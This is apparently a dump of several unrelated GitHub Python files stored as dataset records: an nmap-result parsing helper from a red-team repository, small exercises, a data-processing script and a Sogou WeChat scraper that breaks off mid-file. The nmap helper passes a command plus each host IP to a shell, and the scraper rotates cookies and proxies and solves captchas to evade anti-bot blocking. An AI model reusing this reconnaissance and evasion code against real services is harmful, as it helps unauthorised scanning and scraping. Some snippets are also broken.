constants.PORT_OPT_TCP:\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(tcpPorts))))\n elif option == constants.PORT_OPT_UDP:\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(udpPorts))))\n elif option == constants.PORT_OPT_COMBINED:\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(allPorts))))\n return output\n\ndef getNmapFiltersString(filters):\n filterString = \"\"\n if filters.areFiltersSet():\n filterString += getHeader(\"Output filtered by:\")\n if filters.hostFilterSet():\n filterString += (\"Host filter [host_filter]: %s\" % ([filter.filter for filter in filters.hosts])) + os.linesep\n if filters.serviceFilterSet():\n filterString += (\"Service filter [service_filter]: %s\" % (filters.services)) + os.linesep\n if filters.portFilterSet():\n filterString += (\"Port filter [port_filter]: %s\" % (filters.ports)) + os.linesep\n if filters.mustHavePorts:\n filterString += (\"Must have ports filter [have_ports]: %s\" % str(filters.mustHavePorts)) + os.linesep\n if filters.onlyAlive:\n filterString += (\"Alive filter [only_alive]: %s\" % str(filters.onlyAlive)) + os.linesep\n return filterString\n\ndef printNmapFilters(filters):\n filterString = getNmapFiltersString(filters)\n if(len(filterString) > 0):\n hprint(filterString)\n \n\ndef getHostListOutput(nmapOutput, includePorts = True, filters = None):\n '''Returns string representations of filtered hosts output'''\n if filters == None:\n filters = nmap.NmapFilters()\n\n output = common.TextOutput()\n output.addHumn(getNmapFiltersString(filters))\n output.addHumn(getHeader('Matched IP list'))\n\n # Get all hosts that are up and matched filters\n hostsOutput = []\n for host in nmapOutput.getHosts(filters=filters):\n curHostOutput = [host.ip, '']\n for protocol in constants.PROTOCOLS: \n fullPortsString = ''\n for port in [port for port in host.ports if port.protocol == protocol]:\n tmpPortString = str(port.portId) \n if(settings.colourSupported and port.matched):\n tmpPortString = \"\\033[1;32m\" + tmpPortString + \"\\033[1;m\"\n if len(fullPortsString) > 0:\n fullPortsString += \",\"\n fullPortsString += tmpPortString\n curHostOutput[1] += \"%s:[%s] \" % (protocol,fullPortsString)\n hostsOutput.append(curHostOutput)\n \n for hostOutput in hostsOutput:\n if includePorts:\n output.addMain(\"%s\\t%s\" % (hostOutput[0], hostOutput[1]))\n else:\n output.addMain(hostOutput[0])\n return output\n\ndef printHosts(nmapOutput, includePorts = True, filters=None):\n textOutput = getHostListOutput(nmapOutput, includePorts=includePorts, filters=filters)\n textOutput.printToConsole()\n\n# Order array of IPs\ndef sortIpList(ip_list):\n ipl = [(IP(ip).int(), ip) for ip in ip_list]\n ipl.sort()\n return [ip[1] for ip in ipl]\n\ndef printImportSummary(nmapOutput, detailed=True):\n if(detailed):\n for file in nmapOutput.FilesImported:\n sprint(\"Successfully loaded \" + file)\n sprint(os.linesep + \"Successfully loaded \" + str(len(nmapOutput.FilesImported)) + \" files\")\n if len(nmapOutput.FilesFailedToImport) > 0:\n eprint(\"The following files failed to parse:\")\n for file in nmapOutput.FilesFailedToImport:\n eprint(\"\\t\" + file)\n\ndef getServiceListOutput(nmapOutput, filters=None, verbose=False, includePorts=True):\n services = nmapOutput.getServices(filters)\n output = common.TextOutput()\n output.addHumn(getHeader('Service List'))\n first = True\n for service in services:\n if(verbose):\n if first:\n first = False\n else:\n output.addMain(\"\")\n svcString = service.name\n if(includePorts):\n svcString += \" \" + str(sorted(service.ports))\n output.addMain(svcString)\n if verbose:\n for host in service.hosts:\n hostString = ' ' + host.ip \n if(includePorts):\n hostString += \" \" + str(sorted(host.ports))\n output.addMain(hostString)\n return output\n\ndef printServiceList(nmapOutput, filters=None, verbose=False):\n textOutput = getServiceListOutput(nmapOutput, filters=filters, verbose=verbose)\n textOutput.printToConsole()\n\n# Execute commands\ndef executeCommands(cmd, nmapOutput, filters=None):\n if(filters == None):\n filters = nmap.NmapFilters()\n header('Running Commands')\n for host in nmapOutput.getHosts(filters):\n if len(host.ports) > 0:\n executeCommand(cmd, host.ip)\n\n# Execute Single Command\ndef executeCommand(cmd, ip):\n curCommand = cmd + \" \" + ip\n hprint(\"Running command: '%s'\" % curCommand)\n process = Popen(curCommand, shell=True, stdout=PIPE)\n output = process.stdout.read()\n hprint(\"Finished running command: %s\" % curCommand)\n header(\"OUTPUT for '%s':\" % curCommand)\n if output == '':\n print('')\n else:\n print(output)\n print('')\n\ndef printAliveIps(nmapOutput):\n header('Alive IP list')\n # Get all hosts that are up and matched filters\n tmpParsedHosts = nmapOutput.getAliveHosts()\n for ip in sortIpList(tmpParsedHosts):\n print(\"%s\" % (ip))\n\ndef getFilesInDir(directory, filter='', recurse=False):\n allFiles = []\n regex = re.compile(filter)\n if(recurse):\n for root, dirs, files in os.walk(directory):\n allFiles.extend([os.path.join(root, file) for file in files if regex.match(os.path.join(root, file))])\n else:\n allFiles.extend([os.path.join(directory, file) for file in os.listdir(directory) if regex.match(os.path.join(directory, file))])\n return allFiles\n\ndef stringToHostFilter(filterString):\n hostFilter = []\n rawHostFilterString = filterString\n # Remove any excess white space (start/end/between commas)\n curHostFilterString = rawHostFilterString.strip() #re.sub(r'[^\\d\\./,]', '', rawHostFilterString)\n # Split filter on comma, ignore empty entries and assign to filter\n tmpHostFilter = [ip.strip() for ip in curHostFilterString.split(',') if len(ip) > 0]\n for curHostFilter in tmpHostFilter:\n isFilename = False\n curFilters = []\n # Check is specified filter is a file and attempt to load each line if it is\n if(os.path.isfile(curHostFilter)):\n try:\n isFilename = True\n fhFile = open(curHostFilter, 'r')\n for line in fhFile:\n if(len(line.strip()) > 0):\n curFilters.append(line.strip())\n fhFile.close()\n except:\n eprint(\"Failed to load contents of: \" + curHostFilter)\n else:\n curFilters.append(curHostFilter)\n \n for filter in curFilters:\n validFilter = False\n isIp = False\n try:\n ipaddress.ip_address(filter)\n validFilter = True\n isIp = True\n except ValueError:\n pass\n\n try:\n ipaddress.ip_network(filter)\n validFilter = True\n except ValueError:\n pass\n if(validFilter):\n hostFilter.append(nmap.NmapHostFilter(filter, isIp))\n else:\n if(isFilename):\n eprint(\"Invalid host filter (within %s) option ignored: %s\" % (curHostFilter, filter))\n else:\n eprint(\"Invalid host filter option ignored: \" + filter)\n return hostFilter\n\ndef getJsonValue(jsonData, id):\n if id in jsonData:\n return jsonData[id]\n else:\n return ''\n\ndef getEpoch():\n return int(time.time())\n\ndef getHostDetails(host):\n output = common.TextOutput()\n # Get overview\n output.addHumn(getHeader(\"Overview\"))\n output.addMain(\"IP: %s\" % host.ip)\n if(host.ip != host.hostname):\n output.addMain(\"Hostname: %s\" % host.hostname)\n output.addMain(\"State: %s\" % host.getState())\n openTcp = len(host.getUniquePortIds(constants.PORT_OPT_TCP))\n openUdp = len(host.getUniquePortIds(constants.PORT_OPT_UDP))\n output.addMain(\"TCP ports open: %s\" % openTcp)\n output.addMain(\"UDP ports open: %s\" % openUdp)\n output.addMain(\"Total ports open: %s\" % (openTcp + openUdp))\n\n # Output port details\n output.addHumn(getHeader(\"Ports / Services\"))\n portTableHeaders = ['Port', 'Protocol', 'Service']\n output.addMain(tabulate.tabulate([[port.portId, port.protocol, port.service] for port in host.ports], headers = portTableHeaders, tablefmt=\"github\"))\n\n # Output files found in\n output.addHumn(getHeader(\"Files Containing Host\"))\n if(len(host.filesWithHost) == 0):\n output.addErrr(\"Host not present within any files\")\n else:\n for file in host.filesWithHost:\n output.addMain(file)\n \n return output\n\ndef wrapText(text, maxChars = 50):\n wrappedText = ''\n splitText = text.split()\n curLine = ''\n tmpLine = ''\n for word in splitText:\n tmpLine = \"%s %s\" % (curLine, word)\n if(len(tmpLine) > maxChars):\n wrappedText += curLine + os.linesep\n curLine = ''\n else:\n curLine = tmpLine\n # Make sure to add any text that didnt hit char limit\n return wrappedText + \" \" + tmpLine \n\ndef getNmapFiles(fileOrDir, recurse=False):\n if os.path.isdir(fileOrDir):\n return getFilesInDir(fileOrDir, filter=r'.*\\.xml$', recurse=recurse)\n else:\n return [fileOrDir]","repo_name":"ryanmrestivo/red-team","sub_path":"Reporting-Tools/nmap-parse-python/modules/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":12673,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"71250476534","text":"import re\r\ndef valid_email(email):\r\n pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$'\r\n return True if re.match(pattern,email) else False\r\nemails=[\"vijay.kuamr@example.com\",\r\n \"arunaannam@gmail.com\",\r\n \"abhianav-email\",\r\n \"chandu.smith@gmail\",\r\n \"rohithbaddam\",\r\n \"priyak@123.45\"\r\n]\r\nfor i in emails:\r\n print(f'{i} is a valid email address' if valid_email(i) \\\r\n else f'{i} not a valid email address')\r\n","repo_name":"Vijaykumar069/Cognifyz_Technologies","sub_path":"CognifyzTechnologies/Level1Tasks/ValidEmail.py","file_name":"ValidEmail.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37546442045","text":"# !usr/bin/python\r\n# -*- coding:utf-8 -*-\r\n\r\ndef intersection1(nums1, nums2):\r\n \"\"\"\r\n :type nums1: List[int]\r\n :type nums2: List[int]\r\n :rtype: List[int]\r\n \"\"\"\r\n d = {}\r\n ans = []\r\n for num in nums1:\r\n d[num] = d.get(num, 0) + 1\r\n \r\n for num in nums2:\r\n if num in d:\r\n ans.append(num)\r\n del d[num] # 存在便删除字典中的元素\r\n return ans\r\n\r\ndef intersection2(nums1, nums2):\r\n \"\"\"\r\n :type nums1: List[int]\r\n :type nums2: List[int]\r\n :rtype: List[int]\r\n \"\"\"\r\n nums1 = set(nums1)\r\n return [x for x in set(nums2) if x in nums1]\r\n\r\ndef main():\r\n nums1 = [1,2,2,1]\r\n nums2 = [2,2]\r\n print(intersection1(nums1, nums2))\r\n print(intersection2(nums1, nums2))\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"ywwill/LeetCode-Python","sub_path":"349.intersection-of-two-arrays/intersection-of-two-arrays.py","file_name":"intersection-of-two-arrays.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9801900493","text":"import pathlib\nimport pandas as pd\nfrom openpyxl import Workbook, load_workbook\nfrom openpyxl.utils.dataframe import dataframe_to_rows\n\ndata = {\n \"product name\": [\"product 1\", \"product 2\"],\n \"sales month 1\": [10, 20],\n \"sales month 2\": [5, 35],\n}\n\ndf = pd.DataFrame(data)\nprint(df)\n\nworkbook = Workbook()\nsheet = workbook.active\n\nfor row in dataframe_to_rows(df, index=False, header=True):\n sheet.append(row)\n\n\nfilepath = pathlib.Path.home().joinpath(\"Downloads/test14.xlsx\")\nworkbook.save(filepath)\n\nworkbook = load_workbook(filepath)\nsheet = workbook.active\nvalues = sheet.values\ndf = pd.DataFrame(values)\nprint(df)\n","repo_name":"tinylambda/keep","sub_path":"module_openpyxl/openpyxl_simple_with_pandas.py","file_name":"openpyxl_simple_with_pandas.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12900468456","text":"#This module is responsible for processing functions\n\npush_data = \"\\nD=M\\n@SP\\nA=M\\nM=D\\n@SP\\nM=M+1\\n\"\n\n#Handling command \"function f k\"\ndef function_declaration(func_name, local_vars):\n local_vars = int(local_vars)\n ret = \"(\" + func_name + \")\"\n while local_vars > 0:\n ret += \"\\n@SP\\nA=M\\nM=0\\n@SP\\nM=M+1\\n\"\n local_vars -= 1\n return ret\n\n#Handling command \"call f n\"\ndef function_call(func_name, args, ret_add):\n result = \"@\" + ret_add + push_data.replace('M','A',1) + \"@LCL\" + push_data + \"@ARG\" + push_data + \"@THIS\" + push_data + \"@THAT\" + push_data\n result += \"@SP\\nD=M\\n@LCL\\nM=D\\n@ARG\\n\"\n args = int(args)\n while args > 0:\n result += \"D=D-1\\n\"\n args -= 1\n for _ in range(5):\n result += \"D=D-1\\n\"\n result += (\"M=D\\n@\" + func_name + \"\\n0;JMP\\n\" + \"(\" + ret_add + \")\\n\")\n return result\n\n#Handling command \"return\" in a function\n#Load the return address first, then the value later.\ndef return_value():\n update_segments = [\"THAT\",\"THIS\",\"ARG\",\"LCL\",\"RET\"]\n result = \"@SP\\nA=M-1\\nD=M\\n@RETVAL\\nM=D\\n@LCL\\nD=M\\n@FRAME\\nM=D\\n@ARG\\n\"\n result += \"D=M\\n@SP\\nM=D+1\\n@FRAME\\nD=M\\n\"\n for segment in update_segments:\n result += (\"@\" + segment + \"\\nM=D-1\\nA=M\\nD=M\\n@\" + segment + \"\\nM=D\\n@FRAME\\nMD=M-1\\n\")\n result += \"@RETVAL\\nD=M\\n@SP\\nA=M-1\\nM=D\\n@RET\\nA=M;JMP\\n\"\n return result","repo_name":"HenryNg101/Nand2Tetris-solution","sub_path":"VM Translator/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37628336492","text":"import requests\nimport json\nimport pyrebase\nimport os\nfrom PIL import Image\n\n\"\"\"\n-------------------------------------------------------------------------------------------------\n---------Only these variables need to be adapted to process the desired output and data.---------\n-------------------------------------------------------------------------------------------------\n\"\"\"\n\nlogin_url = \"https://health.api.makia.ml/login\" # POST-Request to get JWT Token\ndata_url = \"https://health.api.makia.ml/rock\" # GET-Request to get Data from API\nimage_url = 'https://health.api.makia.ml/rock/image/' # GET-Request to get a specific picture with the hash-value\n\n# number of the homogenous area from when the images are to be downloaded\nfrom_number_of_hb = 0\n\n# TODO: insert correct username and password\npayload = json.dumps({\n \"username\": \".............\",\n \"password\": \".............\"\n})\n\n# credits for firebase initialization\n# TODO: insert right apiKey\ncredits = {\"apiKey\": \"...........................\",\n \"authDomain\": \"rock-ai-us-central1\",\n \"databaseURL\": \"https://rock-ai-db.firebaseio.com\",\n \"storageBucket\": \"rock-ai-us-central1\"\n }\n\n# this can be set as false if the json file 'raw_data.json' exists and then the json data is used for the following processing\nDOWNLOAD_DATA_FROM_ROCK_AI_API = False\n\nDOWNLOAD_PICTURES_FROM_API = False\nUPLOAD_PICTURES_TO_FIRESTORE = False # DOWNLOAD_PICTURES_FROM_API = True have to be setted\nSTORE_PICTURES_LOCALLY = False # DOWNLOAD_PICTURES_FROM_API = True have to be setted\nSAVE_LINK_FROM_EACH_FIRESTORE_PICTURE = False # Pictures already have to be store in the firebase storage\n\n# to generate the firebase_data.json file, the picture muss be uploaded to the firestore\n# and the SAVE_LINK_FROM_EACH_FIRESTORE_PICTURE = True must be setted\nGENERATE_FIRESTORE_DATA_JSON = False\n\nGENERATE_SINGLE_LABEL_CSV = True\nGENERATE_MULTI_LABEL_CSV = False\n\n# the images have to be store in ../Image_Augmentation/images locally\nGENERATE_LABELS_AUGMENTATION_IMAGES = True\n\nPRINT_INTERNAL_DATA_ARRAY = False\n\n\"\"\"\n-------------------------------------------------------------------------------------------------\n\"\"\"\n\n\n# prints the data, which is stored in the internal array\ndef print_data_array(data_array):\n i = 1\n for hb in data_array:\n print(f'{i} Homogenbereich:')\n print(f' Gebirgsverhaltenstyp = {hb[0]}')\n print(f' Vegetationseinfluss = {hb[1]}')\n print(f' Gefaehrdungsklasse = {hb[2]}\\n')\n i += 1\n\n\n# generate the json file of the whole data to upload it to a firebase firestore\ndef generate_json_string(data_array, image_links):\n i = 0\n json_string = '['\n for hb in data_array:\n if i == 41:\n continue\n json_string += '{\"gebirgsverhaltenstyp\": \"' + hb[0] + '\", \"vegetationseinfluss\": \"' + hb[1] \\\n + '\", \"gefaehrdungsklasse\": \"' + hb[2] + '\", \"images\": ['\n for img in image_links[i]:\n json_string += '\"' + img + '\",'\n\n json_string = json_string[:-1] + ']},'\n i += 1\n\n json_string = json_string[:-1] + ']'\n\n # write data into .json file\n with open('firebase_data.json', 'w') as file_object: # open the file in write mode\n json.dump(json.loads(json_string), file_object)\n\n\n# creates labels of all pictures in csv-format\ndef create_lables(imageHash_array, data_array, multilabeling):\n csv_data = []\n\n for i in range(len(imageHash_array)):\n for j in range(len(imageHash_array[i])):\n img_aug_index = 0\n\n if i < 10:\n i_string = '0' + str(i)\n else:\n i_string = str(i)\n if j < 10:\n j_string = '0' + str(j)\n else:\n j_string = str(j)\n\n # with this if, this pictures will be not labeled and are for reserved for testing\n # if not (i == 0 or i == 39 or i == 40 or (i == 13 and j == 0)):\n csv_line = f'gs://rock-ai-us-central1/images/image{i_string}_{j_string}.jpeg,{data_array[i][2]}'\n\n if multilabeling:\n csv_line += f',{data_array[i][0]},{data_array[i][1]}\\n'\n else:\n csv_line += '\\n'\n\n # print(csv_line)\n csv_data.append(csv_line)\n\n # generate labels for all augmented images\n if GENERATE_LABELS_AUGMENTATION_IMAGES:\n while os.path.isfile(f'../Image_Augmentation/images/image{i_string}_{j_string}_{img_aug_index}.jpeg'):\n csv_line = f'gs://rock-ai-us-central1/images_augmentation/image{i_string}_{j_string}_{img_aug_index}.jpeg,{data_array[i][2]}'\n\n if multilabeling:\n csv_line += f',{data_array[i][0]},{data_array[i][1]}\\n'\n else:\n csv_line += '\\n'\n\n csv_data.append(csv_line)\n img_aug_index += 1\n\n filename = \"multi_labels.csv\" if multilabeling else \"single_label.csv\"\n csv_file = open(filename, \"w\")\n csv_file.writelines(csv_data)\n csv_file.close()\n\n\n\"\"\"\n-------------------------------------------------------------------------------------------------\n-------------------------------------------MAIN METHOD-------------------------------------------\n-------------------------------------------------------------------------------------------------\n\"\"\"\nif __name__ == '__main__':\n if DOWNLOAD_DATA_FROM_ROCK_AI_API:\n print(\"Downloading data from API: \")\n headers = {\n 'Content-Type': 'application/json'\n }\n\n # post request with login data to get jwt-toke for authorization\n jwt_token = requests.request(\"POST\", login_url, headers=headers, data=payload)\n print(\"JWT-Token for Authorization: \", jwt_token.text)\n\n headers = {\n 'Authorization': 'Bearer ' + jwt_token.text,\n 'Content-Type': 'application/json'\n }\n\n # get the dataset from the API\n data = requests.request(\"GET\", data_url, headers=headers, data=payload)\n\n # write data into .json file\n with open('raw_data.json', 'w') as file_object: # open the file in write mode\n json.dump(data.json(), file_object)\n\n print(\"Downloading data from API finished!\")\n\n # ----------- store json data into array --------------\n # load request data from local json-file\n json_file = open(\"raw_data.json\")\n json_data_array = json.load(json_file)\n json_file.close()\n\n # in imageHash_array[1] and imageLink_array[1] are the corresponding images to the data in data_array[1] (same index)\n data_array = [] # ['gebirgsverhaltenstyp', 'vegetationseinfluss', 'gefaehrdungsklasse']\n imageHash_array = [] # [ImageHash 1, ImageHash 2, ...]\n imageLink_array = [] # [Imagelink 1, ImageLink 2, ...]\n\n i = 0\n for i in range(len(json_data_array)):\n if i == 41: # other data in the array\n continue\n hb = [json_data_array[i]['classificationManually']['gebirgsverhaltenstyp'],\n json_data_array[i]['classificationManually']['vegetationseinfluss'],\n json_data_array[i]['classificationManually']['gefaehrdungsklasse']]\n data_array.append(hb)\n\n j = 0\n image = []\n for j in range(len(json_data_array[i]['images'])):\n image.append(json_data_array[i]['images'][j])\n\n imageHash_array.append(image)\n\n if PRINT_INTERNAL_DATA_ARRAY:\n print_data_array(data_array)\n\n # ------ get images from API -------------\n\n # pictures from hb 41 and upwards get downloaded und into firestore uploaded\n for i in range(from_number_of_hb, len(imageHash_array)):\n j = 0\n links = []\n for j in range(len(imageHash_array[i])):\n # downloading pictures from URL\n if DOWNLOAD_PICTURES_FROM_API:\n print(f'Downloading images from API - HB {i}: ', end=\"\")\n image_url += + imageHash_array[i][j]\n image = requests.request(\"GET\", image_url, headers=headers, data=payload)\n print(\"finished\")\n\n # link: https://github.com/thisbejim/Pyrebase (import, if authentication rules are set)\n firebase = pyrebase.initialize_app(credits)\n storage = firebase.storage()\n\n # upload image to firestore\n if i < 10:\n i_string = '0' + str(i)\n else:\n i_string = str(i)\n if j < 10:\n j_string = '0' + str(j)\n else:\n j_string = str(j)\n\n # Upload pictures\n if UPLOAD_PICTURES_TO_FIRESTORE:\n print(f'Uploading images from HB {i} to Firebase Storage: ', end=\"\")\n storage.child(f'images/image{i_string}_{j_string}.jpeg').put(f'images/image{i}_{j}.jpeg')\n print(\"finished\")\n\n # store picture token to get access via url\n if SAVE_LINK_FROM_EACH_FIRESTORE_PICTURE:\n links.append(storage.child(f'images/image{i_string}_{j_string}.jpeg').get_url('idToken'))\n\n # save pictures locally\n if STORE_PICTURES_LOCALLY:\n file = open(f'images/image{i_string}_{j_string}.jpeg', \"wb\")\n file.write(image.content)\n file.close()\n\n imageLink_array.append(links)\n\n if GENERATE_SINGLE_LABEL_CSV:\n print('\\nCreating single-labels: ', end=\"\")\n create_lables(imageHash_array, data_array, False)\n print('finished')\n\n if GENERATE_MULTI_LABEL_CSV:\n print('\\nCreating multi-labels: ', end=\"\")\n create_lables(imageHash_array, data_array, True)\n print('finished')\n\n if GENERATE_FIRESTORE_DATA_JSON:\n print('\\nStart generating json-string and file: ', end=\"\")\n generate_json_string(data_array, imageLink_array)\n print('finished')\n\n print('\\nWhole process is finished!')\n","repo_name":"ManuelSperl/Rock-AI","sub_path":"Rock-AI-Backend/API_Requests/API_Request_generateJSON.py","file_name":"API_Request_generateJSON.py","file_ext":"py","file_size_in_byte":9986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16111007665","text":"import numpy as np\ninputs = tf.keras.Input(shape=(3, 1))\nlstm = layers.LSTM(1, return_sequences=True)(inputs)\nmodel_lstm_1 = tf.keras.models.Model(inputs=inputs, outputs=lstm)\ninputs = tf.keras.Input(shape=(3, 1)) \nlstm = layers.LSTM(1, return_sequences=False)(inputs)\nmodel_lstm_2 = tf.keras.models.Model(inputs=inputs, outputs=lstm)\n#Sequences t1, t2, and t3 \ndata = [[[0.1]\n [0.2],\n [0.3]]]\nprint(data)\nprint(\"output when return_sequencesis set to True\",model_lstm_1.predict(data))\nprint(\"output when return_sequencesis set to False\",model_lstm_2.predict(data))\n\n\n\n\n\n","repo_name":"msaluck/ml-huawei-lab","sub_path":"deeplearning-lab/Deep Learning/Common Modules of TensorFlow 2/Model Building/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10678649412","text":"import numpy as np\n\n# ----------------------------------------------------------------\ndef h5getstr(fid, name):\n if type(fid) is str:\n fid = h5py.File(fid,'r')\n\n dsetid = fid.get(name)\n if not dsetid:\n return ''\n\n # NOTE: This next step used to be the intuitive\n # val = dsetid.value\n # Now you get a bizarre warning if you use it: H5pyDeprecationWarning: dataset.value has been deprecated. Use dataset[()] instead\n # Replacing with the following line will get rid of the annoying warning\n val = dsetid[()] # new notation\n\n valbytes = val.tostring()\n valstr = valbytes.decode()\n\n if type(fid) is str:\n fid.close()\n\n return valstr\n","repo_name":"BUNPC/Homer3","sub_path":"DataTree/AcquiredData/DataFiles/Hdf5/hdf5lib.py","file_name":"hdf5lib.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"21"} +{"seq_id":"1878803907","text":"#! /usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport base64\nimport random\nimport time\nimport json\nimport re\nfrom urllib.parse import quote\nimport hashlib\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom service.core.utils.http_ import Requester\nfrom service.db.utils.redis_utils import RedisClient\nfrom service.exception import retry\nfrom service.exception.exceptions import *\nfrom service import logger\nfrom service.micro.utils import ua\nfrom service.micro.utils.cookie_utils import dict_to_cookie_jar, cookie_jar_to_dict\nfrom service.micro.utils.math_utils import wechat_date_next, to_json\n\n\nclass SouGouGongZhongHaoSpider(object):\n __name__ = 'Sou Gou G ong Zhong Hao'\n\n def __init__(self, params=None):\n self.params = params\n self.ua = ua()\n self.cookies = self.get_cookie()\n self.requester = Requester(cookie=dict_to_cookie_jar(self.cookies), timeout=20)\n self.account = self.params.get(\"account\")\n\n def get_cookie(self):\n redis_cli = RedisClient('cookies', 'wechat')\n return redis_cli.return_choice_cookie()\n\n def next_cookie(self):\n cookie = dict_to_cookie_jar(self.get_cookie())\n self.requester = Requester(cookie=cookie, timeout=15)\n\n def update_cookie(self, snuid):\n cookie_dic = self.requester.cookie()\n cookie_dic.update(SNUID=snuid)\n cookie_dic = json.dumps(cookie_dic)\n self.requester = Requester(cookie=dict_to_cookie_jar(cookie_dic), timeout=15)\n\n def random_num(self):\n return random.uniform(1, 3)\n\n def retrun_md5(self, s):\n m = hashlib.md5()\n m.update(s.encode(\"utf-8\"))\n return m.hexdigest()\n\n def query(self):\n data = self.get_gongzhonghao_data()\n if data:\n return dict(\n status=200,\n msg=\"success\",\n result=data\n )\n else:\n return dict(\n status=200,\n msg=\"暂无公众号信息\"\n )\n\n @retry(max_retries=3, exceptions=(HttpInternalServerError, TimedOutError, RequestFailureError), time_to_sleep=0.5)\n def get_gongzhonghao_data(self):\n logger.info(\"{} Begin get gong zhong hao...\".format(self.__name__))\n url = \"https://weixin.sogou.com/weixin?type=1&s_from=input&query={}&ie=utf8&_sug_=n&_sug_type_=\".format(\n quote(self.account))\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36\",\n 'Connection': 'keep-alive',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Host': 'weixin.sogou.com',\n 'Referer': \"https://weixin.sogou.com/weixin?type=1&s_from=input&query={}&ie=utf8&_sug_=n&_sug_type_=\".format(\n quote(self.account))\n }\n try:\n data_list = []\n resp = self.requester.get(url, header_dict=headers)\n if 'charset=\"utf-8\"' in resp.text:\n resp.encoding = \"utf-8\"\n if \"用户您好,我们的系统检测到您网络中存在异常访问请求\" in resp.text:\n captcha_code = self.get_captcha_code(self.account)\n is_ok = self.verify_captcha_code(captcha_code, self.account)\n raise RequestFailureError\n elif self.account in resp.text and resp.text.find(\"account_article_0\"):\n soup = BeautifulSoup(resp.text, \"lxml\")\n li_obj_list = soup.find_all(\"li\", attrs={\"id\": True})\n i = 0\n for li_obj in li_obj_list:\n try:\n title = li_obj.find(\"a\", attrs={\"uigs\": \"account_article_{}\".format(i)}).text.strip()\n except:\n continue\n gong_zhong_hao = li_obj.find(\"a\", attrs={\"uigs\": \"account_name_{}\".format(i)}).text.strip()\n zifuchuo = re.findall(r\"timeConvert\\('(\\d+)'\\)\", li_obj.text)\n aid = self.retrun_md5(zifuchuo[0])\n article_date = datetime.strptime(\n time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(int(zifuchuo[0]))), \"%Y-%m-%d %H:%M:%S\")\n url = 'https://weixin.sogou.com' + li_obj.find(\"a\", attrs={\"uigs\": \"account_article_{}\".format(i)}).attrs.get(\n \"href\")\n b = random.randint(0, 99)\n a = url.index('url=')\n a = url[a + 25 + b:a + 26 + b:]\n url += '&k=' + str(b) + '&h=' + a\n wechat_num = li_obj.find(\"label\", attrs={\"name\": \"em_weixinhao\"}).text.strip()\n profile_meta = li_obj.find(\"dd\").text.strip()\n data = dict(\n gong_zhong_hao=gong_zhong_hao,\n title=title,\n article_date=article_date,\n url=url,\n aid=aid,\n wechat_num=wechat_num,\n profile_meta=profile_meta\n )\n data_list.append(data)\n i += 1\n return data_list\n else:\n logger.info(\"gei wechat gong zhong hao failed\")\n self.next_cookie()\n self.requester.use_proxy()\n raise RequestFailureError\n except Exception as e:\n logger.exception(e)\n self.requester.use_proxy()\n raise RequestFailureError\n\n @retry(max_retries=3, exceptions=(CaptchaVerifiedError,), time_to_sleep=1)\n def get_captcha_code(self, keyword):\n logger.info('%s Processing recognize captcha code ' % (self.__name__,))\n url = \"https://weixin.sogou.com/antispider/util/seccode.php\"\n quo = \"input&query={}&ie=utf8&_sug_=n&_sug_type_=\".format(keyword)\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36\",\n 'Connection': 'keep-alive',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Host': 'weixin.sogou.com',\n 'Referer': \"https://weixin.sogou.com/antispider/?from=/weixin?type=2&s_from={}\".format(quote(quo))\n }\n resp = self.requester.get(url, header_dict=headers)\n if resp:\n res = base64.b64encode(resp.content).decode()\n captcha_code = self.ocr_captcha_code(res)\n return captcha_code\n\n @retry(max_retries=3, exceptions=(HttpInternalServerError, TimedOutError, RequestFailureError), time_to_sleep=2)\n def verify_captcha_code(self, captcha_code, keyword):\n url = \"https://weixin.sogou.com/antispider/thank.php\"\n quo = \"input&query={}&ie=utf8&_sug_=n&_sug_type_=\".format(keyword)\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36\",\n 'Connection': 'keep-alive',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Host': 'weixin.sogou.com',\n 'Referer': 